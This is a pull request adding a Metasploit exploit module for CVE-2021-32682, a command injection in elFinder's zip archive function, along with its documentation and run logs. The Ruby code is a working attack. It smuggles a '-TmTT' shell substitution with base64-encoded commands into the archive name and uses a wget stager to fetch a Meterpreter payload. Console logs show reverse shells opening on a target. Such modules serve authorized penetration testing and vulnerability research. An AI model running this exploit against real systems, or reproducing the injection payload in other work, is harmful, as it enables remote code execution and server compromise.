### PR TITLE
Add module for CVE-2021-32682

### DIFF
--- a/documentation/modules/exploit/linux/http/elfinder_archive_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/elfinder_archive_cmd_injection.md
@@ -1,0 +1,74 @@
+## Vulnerable Application
+
+elFinder versions below 2.1.59 are vulnerable to a command injection
+vulnerability via its archive functionality.
+
+When creating a new zip archive, the `name` parameter is sanitized
+with the `escapeshellcmd()` php function and then passed to the
+`zip` utility. Despite the sanitization, supplying the `-TmTT`
+argument as part of the `name` parameter is still permitted and
+enables the execution of arbitrary commands as the `www-data` user.
+
+Tested on elFinder versions `2.1.57`, `2.1.58`, and `2.1.59`.
+
+### Installation Steps
+
+1. Set up a php server
+2. Download a vulnerable version of the elFinder [software](https://github.com/Studio-42/elFinder/archive/2.1.58.zip)
+3. Rename the minimal connector file: `mv /php/connector.minimal.php-dist /php/connector.minimal.php`
+4. Access the software at `http://<host>/elfinder.html`
+
+Additional installation methods can be found [here](https://github.com/Studio-42/elFinder#installation).
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/elfinder_archive_cmd_injection`
+4. Do: `set RHOST <ip>`
+5. Do: `set LHOST <ip>`
+6. Do: `run`
+7. You should get a meterpreter session.
+
+## Scenarios
+
+### elFinder `v2.1.58` on Ubuntu 20.04.1
+
+```
+msf6 > use exploit/linux/http/elfinder_archive_cmd_injection
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/elfinder_archive_cmd_injection) > set rhost 192.168.140.128
+rhost => 192.168.140.128
+msf6 exploit(linux/http/elfinder_archive_cmd_injection) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(linux/http/elfinder_archive_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. elFinder running version 2.1.58
+[*] Uploading file LojGHIOkAW.txt to elFinder
+[+] Text file was successfully uploaded!
+[*] Attempting to create archive fMuuXCkA.zip
+[+] Archive was successfully created!
+[*] Using URL: http://0.0.0.0:8080/OR3Kz5kxLZp
+[*] Local IP: http://192.168.1.199:8080/OR3Kz5kxLZp
+[*] Client 192.168.140.128 (Wget/1.20.3 (linux-gnu)) requested /OR3Kz5kxLZp
+[*] Sending payload to 192.168.140.128 (Wget/1.20.3 (linux-gnu))
+[*] Command Stager progress -  62.50% done (75/120 bytes)
+[*] Command Stager progress -  89.17% done (107/120 bytes)
+[*] Sending stage (984904 bytes) to 192.168.140.128
+[+] Deleted LojGHIOkAW.txt
+[+] Deleted fMuuXCkA.zip
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.128:39822) at 2021-09-09 16:10:06 -0500
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
+meterpreter > sysinfo
+Computer     : 192.168.140.128
+OS           : Ubuntu 20.04 (Linux 5.11.0-27-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```

--- a/documentation/modules/exploit/linux/http/elfinder_archive_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/elfinder_archive_cmd_injection.md
@@ -4,7 +4,7 @@ elFinder versions below 2.1.59 are vulnerable to a command injection
 vulnerability via its archive functionality.
 
 When creating a new zip archive, the `name` parameter is sanitized
-with the `escapeshellcmd()` php function and then passed to the
+with the `escapeshellarg()` php function and then passed to the
 `zip` utility. Despite the sanitization, supplying the `-TmTT`
 argument as part of the `name` parameter is still permitted and
 enables the execution of arbitrary commands as the `www-data` user.

--- a/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
+++ b/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
@@ -1,0 +1,145 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'elFinder Archive Command Injection',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Thomas Chauchefoin', # discovery
+          'Shelby Pace' # metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2021-32682' ],
+          [ 'URL', 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities' ]
+        ],
+        'Platform' => [ 'linux' ],
+        'Privileged' => false,
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Automatic Target',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2021-06-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
+      )
+    )
+
+    register_options([ OptString.new('TARGETURI', [ true, 'The URI of elFinder', '/' ]) ])
+  end
+
+  def check
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def upload_uri
+    normalize_uri(target_uri.path, 'php', 'connector.minimal.php')
+  end
+
+  def upload_successful?(response)
+    unless response
+      print_bad('Did not receive a response from elFinder')
+      return false
+    end
+
+    if response.code != 200 || response.body.include?('error')
+      print_bad("Request failed: #{response.body}")
+      return false
+    end
+
+    unless response.body.include?('added')
+      print_bad("Failed to add new file: #{response.body}")
+      return false
+    end
+
+    true
+  end
+
+  alias archive_successful? upload_successful?
+
+  def upload_txt_file(file_name)
+    file_data = Rex::Text.rand_text_alpha(8..20)
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
+    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
+    data.add_part(file_data, 'text/plain', nil, "form-data; name=\"upload[]\"; filename=\"#{file_name}\"")
+
+    print_status("Uploading file #{file_name} to elFinder")
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => upload_uri,
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s
+    )
+  end
+
+  def create_archive(archive_name, *files_to_archive)
+    files_to_archive = files_to_archive.map { |file_name| "l1_#{Rex::Text.encode_base64(file_name)}" }
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => upload_uri,
+      'vars_get' =>
+      {
+        'cmd' => 'archive',
+        'name' => archive_name,
+        'target' => 'l1_Lw',
+        'type' => 'application/zip',
+        'targets[]' => files_to_archive.join('&targets%5B%5D=')
+      }
+    )
+  end
+
+  def setup_files_for_sploit
+    @txt_file = "#{Rex::Text.rand_text_alpha(5..10)}.txt"
+    res = upload_txt_file(@txt_file)
+    fail_with(Failure::UnexpectedReply, 'Upload was not successful') unless upload_successful?(res)
+    print_good('Text file was successfully uploaded!')
+
+    @archive_name = "#{Rex::Text.rand_text_alpha(5..10)}.zip"
+    print_status("Attempting to create archive #{@archive_name}")
+    res = create_archive(@archive_name, @txt_file)
+    fail_with(Failure::UnexpectedReply, 'Archive was not created') unless archive_successful?(res)
+    print_good('Archive was successfully created!')
+
+    register_files_for_cleanup(@txt_file, @archive_name)
+  end
+
+  # zip -r9 -q '-TmTT="$(id>out.txt)foooo".zip' './a.zip' './a.txt' - sonarsource blog post
+  def execute_command(cmd, _opts = {})
+    cmd_arg = "-TmTT=\"$(#{cmd})#{Rex::Text.rand_text_alpha(1..3)}\""
+    create_archive(cmd_arg, @txt_file, @archive_name)
+  end
+
+  def exploit
+    setup_files_for_sploit
+    execute_cmdstager(nospace: true, noconcat: true, nodelete: true)
+  end
+end

--- a/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
+++ b/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
           vulnerability via its archive functionality.
 
           When creating a new zip archive, the `name` parameter is sanitized
-          with the `escapeshellcmd()` php function and then passed to the
+          with the `escapeshellarg()` php function and then passed to the
           `zip` utility. Despite the sanitization, supplying the `-TmTT`
           argument as part of the `name` parameter is still permitted and
           enables the execution of arbitrary commands as the `www-data` user.

--- a/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
+++ b/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
@@ -17,11 +17,19 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'elFinder Archive Command Injection',
         'Description' => %q{
+          elFinder versions below 2.1.59 are vulnerable to a command injection
+          vulnerability via its archive functionality.
+
+          When creating a new zip archive, the `name` parameter is sanitized
+          with the `escapeshellcmd()` php function and then passed to the
+          `zip` utility. Despite the sanitization, supplying the `-TmTT`
+          argument as part of the `name` parameter is still permitted and
+          enables the execution of arbitrary commands as the `www-data` user.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Thomas Chauchefoin', # discovery
-          'Shelby Pace' # metasploit module
+          'Thomas Chauchefoin', # Discovery
+          'Shelby Pace' # Metasploit module
         ],
         'References' => [
           [ 'CVE', '2021-32682' ],
@@ -36,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'Arch' => [ ARCH_X86, ARCH_X64 ],
-              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'CmdStagerFlavor' => [ 'wget' ],
               'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
             }
           ]
@@ -44,9 +52,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2021-06-13',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => [ IOC_IN_LOGS ]
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
         }
       )
     )
@@ -55,7 +63,36 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    Exploit::CheckCode::Vulnerable
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => upload_uri
+    )
+
+    return CheckCode::Unknown('Failed to retrieve a response') unless res
+    return CheckCode::Safe('Failed to detect elFinder') unless res.body.include?('["errUnknownCmd"]')
+
+    vprint_status('Attempting to check the changelog for elFinder version')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'Changelog')
+    )
+
+    unless res
+      return CheckCode::Detected('elFinder is running, but cannot detect version through the changelog')
+    end
+
+    # * elFinder (2.1.58)
+    vers_str = res.body.match(/\*\s+elFinder\s+\((\d+\.\d+\.\d+)\)/)
+    if vers_str.nil? || vers_str.length <= 1
+      return CheckCode::Detected('elFinder is running, but couldn\'t retrieve the version')
+    end
+
+    version_found = Rex::Version.new(vers_str[1])
+    if version_found < Rex::Version.new('2.1.59')
+      return CheckCode::Appears("elFinder running version #{vers_str[1]}")
+    end
+
+    CheckCode::Safe("Detected elFinder version #{vers_str[1]}, which is not vulnerable")
   end
 
   def upload_uri
@@ -106,13 +143,14 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'GET',
       'uri' => upload_uri,
+      'encode_params' => false,
       'vars_get' =>
       {
         'cmd' => 'archive',
         'name' => archive_name,
         'target' => 'l1_Lw',
         'type' => 'application/zip',
-        'targets[]' => files_to_archive.join('&targets%5B%5D=')
+        'targets[]' => files_to_archive.join('&targets[]=')
       }
     )
   end
@@ -134,12 +172,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # zip -r9 -q '-TmTT="$(id>out.txt)foooo".zip' './a.zip' './a.txt' - sonarsource blog post
   def execute_command(cmd, _opts = {})
+    cmd = "echo #{Rex::Text.encode_base64(cmd)} | base64 -d |sh"
     cmd_arg = "-TmTT=\"$(#{cmd})#{Rex::Text.rand_text_alpha(1..3)}\""
-    create_archive(cmd_arg, @txt_file, @archive_name)
+    cmd_arg = cmd_arg.gsub(' ', '${IFS}')
+
+    create_archive(cmd_arg, @archive_name, @txt_file)
   end
 
   def exploit
     setup_files_for_sploit
-    execute_cmdstager(nospace: true, noconcat: true, nodelete: true)
+    execute_cmdstager(noconcat: true, linemax: 150)
   end
 end

--- a/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
+++ b/modules/exploits/linux/http/elfinder_archive_cmd_injection.rb
@@ -114,6 +114,10 @@ class MetasploitModule < Msf::Exploit::Remote
       print_bad("Failed to add new file: #{response.body}")
       return false
     end
+    json = JSON.parse(response.body)
+    if json['added'].empty?
+      return false
+    end
 
     true
   end


### PR DESCRIPTION
This adds an exploit module that targets versions < `2.1.59` of the web-based file manager elFinder.

When creating a new zip archive, the `name` parameter is sanitized with the `escapeshellarg()` php function and then passed to the `zip` utility. Despite the sanitization, supplying the `-TmTT` argument as part of the `name` parameter is still permitted and enables the execution of arbitrary commands as the `www-data` user.

Tested on elFinder versions `2.1.57`, `2.1.58`, and `2.1.59`.

## Verification

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use exploit/linux/http/elfinder_archive_cmd_injection`
- [ ] Do: `set RHOST <ip>`
- [ ] Do: `set LHOST <ip>`
- [ ] Do: `run`
- [ ] You should get a meterpreter session.

## Scenarios

### v2.1.57

```
msf6 > use exploit/linux/http/elfinder_archive_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > set rhost 192.168.140.128
rhost => 192.168.140.128
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.57
[*] Uploading file lcysr.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive MjLMPCB.zip
[+] Archive was successfully created!
[*] Using URL: http://0.0.0.0:8080/LdxTMK0Cx
[*] Local IP: http://192.168.1.199:8080/LdxTMK0Cx
[*] Client 192.168.140.128 (Wget/1.20.3 (linux-gnu)) requested /LdxTMK0Cx
[*] Sending payload to 192.168.140.128 (Wget/1.20.3 (linux-gnu))
[*] Command Stager progress -  51.79% done (58/112 bytes)
[*] Command Stager progress -  71.43% done (80/112 bytes)
[*] Sending stage (984904 bytes) to 192.168.140.128
[+] Deleted lcysr.txt
[+] Deleted MjLMPCB.zip
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.128:46232) at 2021-09-09 16:38:57 -0500
[*] Command Stager progress -  83.04% done (93/112 bytes)
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer     : 192.168.140.128
OS           : Ubuntu 20.04 (Linux 5.11.0-27-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

### v2.1.59 (Not vulnerable)

```
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Detected elFinder version 2.1.59, which is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
```